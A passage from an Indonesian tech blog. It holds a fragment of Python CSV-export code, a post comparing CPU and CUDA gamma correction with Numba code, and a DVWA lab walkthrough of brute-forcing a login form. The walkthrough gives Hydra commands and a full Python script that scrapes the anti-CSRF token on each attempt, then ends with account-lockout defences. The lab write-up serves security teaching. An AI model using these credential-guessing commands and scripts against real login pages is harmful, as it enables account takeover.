    writer.writerow(("First Name", "Last Name", "Gender", "Home Address", "City", "Company Name", "Company Address", "Company Coordinate"))

    # Looping data yang di dapat
    for user in user_list:
        first_name = user['firstName']
        last_name = user['lastName']
        gender = user['gender']
        home_address = user['address']['address']
        city = user['address']['city']
        company_name = user['company']['name']
        company_address = user['company']['address']['address']
        lat = user['company']['address']['coordinates']['lat']
        lng = user['company']['address']['coordinates']['lng']
        geo = f'({lat},{lng})'

        # Masukkan data tsb ke CSV mengikuti format yang sudah kita tentukan
        csv_data = (first_name, last_name, gender, home_address, city, company_name, company_address, geo)
        writer.writerow(csv_data)

Perbandingan CPU dan CUDA Pada Gamma Correction

Fri, 31 Dec 2021 00:00:00 GMT

Intro

Beberapa waktu yang lalu saya dan tim berhasil menyelesaikan tugas besar komputasi tersebar dan parallel dimana tim/kelompok saya memilih topik perbandingan performa operasi gamma correction menggunakan CPU dan CUDA. Jika ingin meliha full code untuk project ini dapat dilihat di Google Colaboratory pada link berikut : Link Google Colab

CPU vs GPU CUDA

Fungsi GPU (Graphics processing unit) hampir sama dengan CPU, yang membedakan CPU hanya memiliki beberapa core saja, sedangkan untuk GPU memiliki beberapa ribu core. Lebih tepatnya, fungsi utama GPU yaitu mengolah data grafis atau gambar. GPU biasanya didukung oleh adanya panel yang berfungsi sebagai antarmuka antara user dengan perangkat tersebut.

CUDA singkatan dari Compute Unified Device Architecture merupakan arsitektur komputer paralel yang dikembangkan NVIDIA. CUDA memiliki kemampuan melakukan komputasi yang rumit secara bersamaan sehingga prosess komputai bisa berjalan lebih cepat karena mempunyai bandwidth memori yang lebih besar dan GPU menggunakan Parallelization.

Untuk lebih jelas tentang perbedaan CPU dengan GPU simak video berikut :

Gamma Corection??

Menurut wikipedia:

Gamma Correction merupakan salah satu operasi pada Image Processing yang digunakan untuk mengubah nilai Gamma pada gambar.Gamma dapat digambarkan sebagai hubungan antara input dan output yang dihasilkan. Untuk ruang lingkup percobaan ini inputnya adalah nilai intensitas RGB dari suatu gambar.

Gamma correction juga dikenal sebagai Power Law Transform. Pertama, intensitas piksel gambar kita harus diskalakan dari kisaran [0, 255]. Dari sana, kami mendapatkan gambar output gamma correction dengan menerapkan persamaan berikut:

kemudian output diskalakan kembali ke kisaran [0, 255]. Pada percobaan kali ini kami menggunakan library openCV, numpy, numba, matplotlib, Pillow, dan timeit.

Referensi

https://thecryptmag.com/Online/57/imgproc_6.html

Pseudo code pada link referensi

  gammaCorrection = 1 / gamma
  colour = GetPixelColour(x, y)
  newRed = 255 * (Red(colour) / 255) ^ gammaCorrection
  newGreen = 255 * (Green(colour) / 255) ^ gammaCorrection
  newBlue = 255 * (Blue(colour) / 255) ^ gammaCorrection
  PutPixelColour(x, y) = RGB(newRed, newGreen, newBlue)

Implementasi

Gambar diambil dari web https://thispersondoesnotexist.com/ sama seperti nama websitenya, gambar orang yang muncul dalam website tersebut merupakan gambar buatan yang dibuat dengan menggunakan GAN (generative adversarial network). Gambar yang kita gunakan dalam percobaan ini berukuran

256x256 pixel
512x512 pixel
1024x1024 pixel
2048x2048 pixel
4096x4096 pixel
8192x8192 pixel

Import Library

import cv2
import numpy as np
import numba
import matplotlib.pyplot as plt
from PIL import Image
from timeit import default_timer as timer

Download Gambar dengan Menggunakan Perintah Linux Wget

#Download gambar

!wget https://raw.githubusercontent.com/mrizkitriyanto/Numba-Gamma-Correction/main/Images/thispersondoesntexist_256.jpg
!wget https://raw.githubusercontent.com/mrizkitriyanto/Numba-Gamma-Correction/main/Images/thispersondoesntexist_512.jpg
!wget https://raw.githubusercontent.com/mrizkitriyanto/Numba-Gamma-Correction/main/Images/thispersondoesntexist_1024.jpg
!wget https://raw.githubusercontent.com/mrizkitriyanto/Numba-Gamma-Correction/main/Images/thispersondoesntexist_2048.jpg
!wget https://raw.githubusercontent.com/mrizkitriyanto/Numba-Gamma-Correction/main/Images/thispersondoesntexist_4096.jpg
!wget https://raw.githubusercontent.com/mrizkitriyanto/Numba-Gamma-Correction/main/Images/thispersondoesntexist_8192.jpg

Load Gambar

Ketikkan kode berikut dan ulangi hingga sampai ukuran 8192 piksel

img_256 = cv2.imread('thispersondoesntexist_256.jpg')
img_256 = cv2.cvtColor(img_256, cv2.COLOR_BGR2RGB)
plt.imshow(img_256)

Output akan seperti berikut:

Pembuatan Dictionary Image

Dictionary digunakan untuk menyimpan nilai data dalam pasangan key:value. Penggunaan dictionary ini bertujuan untuk mempermudah dalam mengeksekusi. Masukkan kode sebagai berikut:

#Pembuatan dictionary supaya mudah dalam melakukan eksekusi secara langsung dengan looping

dictsImages = {} #dictionary kosong yang akan diisi dengan key (angka 0 - 3) dan values (gambar 256 hingga 8192)
keys = range(6)
values = [img_256, img_512, img_1024, img_2048, img_4096, img_8192]
for i in keys:
        dictsImages[i] = values[i]
print(dictsImages)

Output akan seperti berikut:

Akan terbentuk dictionary dengan pasangan key dan value. key mulai dari angka 0 hingga 3. Sedangkan value akan berisi array 3 dimensi yang merepresentasikan nilai tiap piksel.

Pembuatan Fungsi Untuk Operasi Gamma Correction Menggunakan CPU

def gamma_correction_seq (image, gamma):
  init_image = np.zeros(image.shape, np.uint8) #inisialisasi variabel init_image dengan value setiap index pada matrix = 0 menggunakan numpy.zeros
  for i in range(image.shape[0]):  # baris
    for j in range(image.shape[1]):  # kolom
      init_image[i][j] = 255.0 * (image[i][j] / 255.0)**(1 / gamma) #mengisi setiap index matrix dengan formula gamma correction yang didapat dari https://thecryptmag.com/Online/57/imgproc_6.html
  return init_image # mengembalikan matrix init_image

Pembuatan Fungsi Untuk Operasi Gamma Correction Menggunakan Cuda

Disini kami menggunakan Numba Vectorize Decorator. Apa itu Numba Vectorize Decorator? Vektor Numba memungkinkan fungsi Python mengambil argumen input skalar untuk digunakan sebagai ufuncs NumPy. Menggunakan vectorize(), Kita dapat menulis fungsi sebagai operasi pada skalar input, bukan array. Numba akan menghasilkan loop (atau kernel) di sekitarnya yang memungkinkan iterasi yang efisien atas input aktual.

Dokumentasi numba

@numba.vectorize('uint8(uint8,float64)',target='cuda')     #menggunakan numba vectorize decorator dengan target cuda (GPU)

#######
#Arti dari fungsi ini adalah gamma_correction_par yang menggunakan numba vectorize(numba telah membuatkan loop(atau kernel) yang  memungkonkan iterasi atas inputan kita)
#kemudian fungsi gamma_correction_par akan mengembalikan nilai setiap index matrix yang valuenya adalah hasil dari formula gamma correction
#######
def gamma_correction_par(image,gamma):
  return 255.0 * (image / 255.0)**(1 / gamma)

Menghitung Waktu Runtime CPU

time_seq = {} #dictionary untuk waktu runtime
output_seq = {} #dictionary untuk output matrix
for keys,values in dictsImages.items():
  start = timer()
  output_seq[keys]=gamma_correction_seq(values, 2)
  time_seq[keys] =  timer() - start
time_seq #waktu runtime untuk setiap key dan value

Output akan menampilkan waktu runtime untuk setiap key dan value

Menghitung Waktu Runtime CUDA

time_par = {} # dictionary untuk waktu runtime
output_par = {} # dictionary untuk output matrix
for keys,values in dictsImages.items():
  start = timer()
  output_par[keys]=gamma_correction_par(values, 2)
  time_par[keys] =  timer() - start
time_par # waktu runtime untuk setiap key dan value

Perbandingan Gambar Hasil Operasi

Gambar Original

Gambar CPU

Gambar CUDA

Grafik Perbandingan

#Grafik Perbandingan Waktu Runtime CPU vs CUDA

def graph(dictionary_sequential,dictionary_parallel,title):
  plt.figure(figsize=(20,12))
  x = sorted(list(map(int,dictionary_sequential.keys()))) #Mengambil dan mengurutkan Key yang diambil dari dictionary time_seq
  y_seq= [dictionary_sequential[i] for i in x] # mengambil waktu eksekusi sequential
  y_par= [dictionary_parallel[i] for i in x] # mengambil waktu eksekusi parallel
  labels = ["256x256", "512x512", "1024x1024", "2048x2048", "4096x4096", "8192x8192"] # Label untuk sumbu X
  plt.plot(x,y_seq,marker='o', c="r") # plot grafix sequential dengan warna merah
  plt.plot(x,y_par,marker='o', c="g") # plot grafik parallel dengan warna hijau
  plt.ylim(ymin=-1)
  plt.xticks(x,labels) # https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.xticks.html?highlight=xtick Mengubah untuk setiap koordinat yang semulanya berisi key dari dictionary [0, 1, 2, 3, 4, 5] menjadi label ["256x256", "512x512", "1024x1024", "2048x2048", "4096x4096", "8192x8192"]
  plt.xlabel('Resolusi gambar (px)')
  plt.ylabel('Waktu dalam satuan detik (s)')
  plt.legend(['Single CPU','CUDA'])
  plt.title(title)
  plt.show

Jalankan fungsi dengan memanggilnya

graph(time_seq,time_par,"Perbandingan Waktu Runtime Gamma Correction")

Berdasarkan proses Gamma Correction dengan mengguankan pendekatan sekuensial dan paralal dapat disimpulkan bahwa performa waktu terbaik berhasil dicapai oleh proses yang dilakukan dengan menggunakan pendekatan paralelism.

Cara Menjalankan Semua Cell Pada Google Colab

Ubah runtime type terlebih dahulu menjadi CUDA caranya pilih menu Runtime -> Change Runtime Type -> pilih GPU -> Save.
Kemudian jalankan cellnya

DVWA Series: Brute Force

Mon, 27 Dec 2021 00:00:00 GMT

Intro

Disclaimer

Apa itu Brute Force ?

Brute Force adalah metode peretasan yang menggunakan “coba-coba” atau trial and error untuk memecahkan kata sandi, kredensial login, dan kunci enkripsi. Peretas mencoba beberapa nama pengguna dan kata sandi, sering kali menggunakan komputer untuk menguji berbagai kombinasi, sampai mereka menemukan informasi login yang benar. Nama “brute force” berasal dari penyerang yang menggunakan upaya paksa yang berlebihan untuk mendapatkan akses ke akun pengguna. Meskipun merupakan metode serangan siber lama, serangan brute force dicoba dan diuji dan tetap menjadi taktik yang populer di kalangan peretas.

Keberhasilan dari teknik ini adalah bergantung terhadap “racikan” wordlist yang si peretas buat. Dalam real case-nya, biasanya peretas mengumpulkan informasi (information gathering) sebanyak-banyaknya, termasuk diantaranya adalah dengan melakukan social engineering.

Untuk lebih jelasnya bisa lihat video berikut:

Apa itu Wordlist?

Dalam hal ini, wordlist adalah kumpulan kata (username atau password) yang akan dicoba satu per satu untuk menemukan password yang valid. Salah satu wordlist yang terkenal adalah rockyou.txt yang berisi jutaan password yang paling umum digunakan. Tetapi biasanya orang-orang tidak menggunakan kata-kata seperti itu lagi, dan walaupun ada, akan memakan waktu yang sangat lama, karena adanya jutaan kata yang dicoba. Sehingga pada real case, sebaiknya kita melakukan information gathering sebaik-baiknya dan meracik wordlist sendiri.

Pengetahuan Dasar yang Wajib Dimiliki

Pengetahuan dasar untuk melakukan brute force (khususnya pada DVWA) adalah paham terhadap logic dari login page atau paham terhadap penggunaan session dll. Kemudian paham atas penggunaan tool seperti Hydra dan Burpsuite yang nantinya akan saya gunakan untuk menyelesaikan challenge ini. Selain itu penggunaan search engine seperti google. Nantinya anda mungkin akan menemukan sesuatu yang baru dan sebagai pentester anda harus bisa mempelajari sesuatu dengan cepat. Ada pun dalam real case-nya, pemahaman seperti limiting, WAF, scripting, dll., saya rasa itu akan mudah dipelajari ketika anda telah terbiasa dengan 2 hal di atas.

Pada bagian akhir akan dibahas bagaimana cara meminimalisir serangan bruteforce pada web kita.

Brute Force level Low

Berikut adalah source-code dari form login level low di DVWA.

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];

    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Information Gathering

Jika kita perhatikan form tersebut menggunakan method GET, sehingga data yang dikirim akan terlihat di dalam URL. Contohnya, ketika saya mengisi nilai username menjadi “user” dan password “password”, maka data tersebut akan terlihat di URL-nya:

http://192.168.1.5/vulnerabilities/brute/?username=user&password=password&Login=Login#

Untuk mengetahui mengenai HTTP method bisa liat vdeo berikut:

atau lebih detail tentang HTTP ada di

Lanjut, jika kita memasukkan username dan password yang salah maka akan muncul pesan sebagai berikut

Kemudian kita coba melihat cookie-nya terlebih dahulu menggunakan Burpsuite (atau menggunakan inspect element pada browser).

gambat1

Terlihat bahwa terdapat cookie PHPSESSID dan security yang digunakan untuk mengatur web itu sendiri. Cookie ini akan kita gunakan untuk melakukan brute force. Jika kita mengamati source-code-nya lagi, terlihat bahwa tidak adanya Anti-CSRF token, limit maupun CAPTCHA. Dengan demikian kita bisa dengan mudah melakukan brute force.

Launch Attack

Kita akan menyarang akun dengan privillege tinggi yaitu admin. Dengan asumsi kita sebagai penyerang mengetahui username akun admin.

Pertama, siapkan wordlist yang akan kita gunakan. Wordlist ini sudah saya siapkan dengan asumsi kita telah melakukan information gathering dan social engineering pada korban yang telah dimasukkan ke dalam file bernama wordlist.txt.

adm
admin
Admin
ADMIN
admin123
@dm1n
administrator
username
katasandi
KataSandi
Password
password
passowrd123
PASSWORD
p@ssw0rd
adminCantik
giniginiadmin
senggoldong

Kemudian, buka terminal dan jalan kan tool bernama Hydra. Berikut perintahnya:

hydra 192.168.1.5 -l admin -P ~/Desktop/wordlist.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSESSID=fv41a97e716jae3njb7acdhbg6; security=low"

Penjelasan : 192.168.1.5 adalah IP atau domain target. -l admin, Sesuai asumsi di atas kita telah mengetahui username dari target yakni “admin”. -P ~/Desktop/wordlist.txt berfungsi untuk menentukan file wordlist untuk password yang akan dicoba satu per satu. http-get-form Untuk menentukan method yang digunakan pada form login. dalam kasus ini menggunakan method GET. username=^USER^&password=^PASS^ nilai pada flag tersebut akan diisi dengan username (-l) dan password (-P) yang telah ditentukan sebelumnya. F=Username and/or password incorrect. digunakan untuk membandingkan hasil brute force. Jika menghasilkan teks tersebut berarti password tidak valid. Pesan tersebut disesuaikan dengan pesan error yang ada di halaman web. H=Cookie: digunakan untuk mengatur cookie yang digunakan ketika mengakses web tersebut.

Maka hasilnya sebagai berikut: Dari gambar di atas terlihat bahwa password yang benar adalah “password” sehingga kita dapat login dengan menggunakan pasangan username dan password tersebut. Sehingga tampilannya menjadi:

Berhasill yeeayy!!! sekarang lanjut ke level medium.

Brute Force level Medium

Berikut adalah source-code dari form login level medium di DVWA.

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Information Gathering

Tidak jauh berbeda dengan level sebelumnya, hanya saja ketika gagal melakukan login akan ada jeda selama 2 detik (terlihat di baris ke-28).

// Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";

Dan jika kita lihat cookienya. yang berubah hanya nilai dari cookie security.

Launch Attack

Karena yang berbeda hanyalah nilai dari security saja maka kita hanya perlu ubah nilai security pada cookir menjadi medium.

hydra 192.168.1.5 -l admin -P ~/Desktop/wordlist.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSESSID=fv41a97e716jae3njb7acdhbg6; security=medium"

Maka hasilnya :

Hasilnya akan sama seperti level sebelumnya. Namun proses pada level medium ini lebih lama karena terjadi delay 2 detik ketika gagal melakukan login.

Okeyy…Lanjut ke level High

Brute Force level Medium

Berikut adalah source-code dari form login level high di DVWA.

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Information Gathering

Pada level high ini, server akan melakukan validasi Anti-CSRF token terlebih dahulu. Dan jika gagal melakukan login akan terjadi delay 0-3 detik. Singkatnya, Anti-CSRF token adalah token yang bersifat unik (setiap adanya request baru nilanya akan berubah) yang digunakan untuk memastikan user melakukan request secara resmi. Penjelasan lebih dalam ada di video berikut:

Jika kita melakukan inspect element, maka akan terlihat terdapat tag input bertipe hidden dengan nama user_token beserta nilainya.

Nilai dari token tersebut akan selalu berubah ketika kita melakukan request yang baru. Jika kita memaksa untuk menggunakan nilai yang sama, maka request akan gagal dilakukan dan halaman akan di-redirect ke form login kembali. Karena Hydra tidak bisa mengatasi Anti-CSRF Token yang selalu berubah-ubah. Maka kita perlu membuat script sendiri menggunakan bahasa Python

Launch Attack

Kita buat dulu scriptnya dengan memanfaatkan beberapa library seperty sys, requests, BeautifulSoup.

from sys import argv
import requests
from bs4 import BeautifulSoup as Soup

# argumen yang nanti akan digunakan
script, wordlistdir, success_message = argv
txt = open(wordlistdir)

# setup target, cookie and session
url = 'http://192.168.1.5/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'fv41a97e716jae3njb7acdhbg6'}
target = requests.Session()
target_page = target.get(url, cookies=cookie)



# Mencari HTML response untuk pesan sukses
def checkSuccess(html):
 soup = Soup(html, features="lxml")
 search = soup.findAll(text=success_message)

 if not search:
  success = False

 else:
  success = True

# mengembalikan hasil bruteforce
 return success

# Mengambil CSRF token dari target memanfaatkan library Soup untuk mencari
page_source = target_page.text
soup = Soup(page_source, features="lxml");
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

# Menampilkan URL
print ('DVWA URL= ' + url)


# Looping sesuai isi wordlist
with open(wordlistdir) as wordlist:
 print ('Sedang menjalankan brute force attack...')
 for password in wordlist:

# Menampilkan password yang dicoba dan CSRF Token
  print ('CSRF Token= '+ csrf_token)
  print ('password yang dicoba: ' + password)
  password = password.strip()


  # setup payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = target.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)

  if not success:
   # ketika gagal CSRF Token akan diganti
   soup = Soup(r.text, features="lxml")
   csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
  else:
   # Kalau berhasil. Pasword ditampilkan
   print ('Berhasil !!! Password =  ' + password)
   break

# Gagal
 if not success:
  print ('Brute force gagal. Password tidak ada di wordlist.')

Penjelasan Code

Import Library

from sys import argv
import requests
from bs4 import BeautifulSoup as Soup

Kemudian kita perlu definisikan argumen ketika menjalankan code.

script, wordlistdir, success_message = argv
txt = open(wordlistdir)

Lanjut, kita inisisalisasi url, cookie, target, dan halaman yang akan di serang dengan menggunakan library request. Kita coba mengambil session dari web page tersebut

url = 'http://192.168.1.5/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'fv41a97e716jae3njb7acdhbg6'}
target = requests.Session()
target_page = target.get(url, cookies=cookie)

Dengan memanfaatkan library beautifulsoap kita membuat sebuah function untuk mengecek apakah login sukses atau tidak

# Mencari HTML response untuk pesan sukses
def checkSuccess(html):
 soup = Soup(html, features="lxml")
 search = soup.findAll(text=success_message)

 if not search:
  success = False

 else:
  success = True

# mengembalikan hasil bruteforce
 return success

Lanjut, kita coba ambil CSRF Token dari web page dengan memanfaatkan library beautifulsoap. Kita ketahui bahwa token tersebut dapat kita lihat pada source-code html dengan tag hidden. Sehingga kita dapat menanfaatkan library beautifulsoap untuk mencari CSRF Token tersebut dengan kode sbb:

# Mengambil CSRF token dari target memanfaatkan library Soup untuk mencari
page_source = target_page.text
soup = Soup(page_source, features="lxml")
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

Print url

# Menampilkan URL
print('DVWA URL= ' + url)

Kemudian kita lakukan looping untuk setiap password yang ada dalam wordlist. Dengan menggunakan with open(wordlistdir) untuk membuka file wordlist. Dan menampilkan password yang dicoba

# Looping sesuai isi wordlist
with open(wordlistdir) as wordlist:
    print('Sedang menjalankan brute force attack...')
    for password in wordlist:
        # Menampilkan password yang dicoba dan CSRF Token
        print('CSRF Token= ' + csrf_token)
        print('password yang dicoba: ' + password)
        password = password.strip()

Kemudian kita siapkan payload untuk di masukkan ke dalam form login. Dengan memasukkan pssword swsuai wordlist dan csrf token yang diambil dari hasil pencarian tadi. Sehingga untuk tiap password akan memiliki token yang berbeda. Kemudian kita inisialisasikan hasil dari percobaan itu ke dalam variabel r dan kita cek menggunakan fungsi checkSuccess() apakah didalam response tersebut terdapat pesan sukses yang didefinisikan pada argumen ketika menjalankan program ini. Ketika terdapat pesan sukses maka akan mengembalikan nilai True dan ketika gagal akan mengembalikan nilai False.

        # setup payload
        payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
        r = target.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)

Cek apakah berhasil atau gagal. Jika berhasil maka looping akan berhenti, namun jika gagal token akan diganti dan loop akan terus berjalan hingga menemukan pesan berhasil atau password dalam wordlist habis.

        if not success:
            # ketika gagal CSRF Token akan diganti
            soup = Soup(r.text, features="lxml")
            csrf_token = soup.findAll(attrs={"name": "user_token"})[
                0].get('value')
        else:
            # Kalau berhasil. Pasword ditampilkan
            print('Berhasil !!! Password =  ' + password)
            break

Terakhir, jika tidak ditemukan password yang cocok atau tidak ditemukan pesan berhasil maka akan menampilkan pesan gagal

    # Gagal
    if not success:
        print('Brute force gagal. Password tidak ada di wordlist.')

Script terinspirasi dari https://www.nu11secur1ty.com/2015/11/dvwa-brute-force-high-level-anti-csrf.html

Untuk menjalankannya pastikan telah menginstall library request dan beautifulsoup menggunakan pip. Jika belum bisa menjalankan perintah berikut:

sudo pip3 install requests
sudo pip3 install beautifulsoup4

Untuk menjalankannya kita perlu memberi beberapa argumen

python3 namafile.py direktori-menuju-wordlist.txt "Pesan berhasil yang didapatkan ketika memasukkan username dan password yang benar"

sehingga menjadi:

python3 bruteforceScript.py ~/Desktop/wordlist.txt "Welcome to the password protected area admin"

Maka hasilnya :

Berhasil !!!. Silakan login menggunakan password tersebut.

Gimana Cara Mencegah Bruteforce Attack Sebagai Web Developer?

Di dalam DVWA juga menyediakan level Imposible dimana pada saat level di setting menjadi imposible maka serangan mustahil untuk berhasil. Berikut source-codenya:


Brute Force Source
vulnerabilities/brute/source/impossible.php
<?php

if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = strtotime( $row[ 'last_login' ] );
        $timeout    = $last_login + ($lockout_time * 60);
        $timenow    = time();

        /*
        print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
        print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
        print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
        */

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow < $timeout ) {
            $account_locked = true;
            // print "The account is locked<br />";
        }
    }

    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    } else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Cara paling jelas untuk memblokir serangan brute force adalah dengan hanya mengunci akun setelah sejumlah percobaan yang salah. Penguncian akun dapat berlangsung dalam durasi tertentu, seperti satu jam, atau akun dapat tetap terkunci hingga dibuka secara manual oleh administrator.

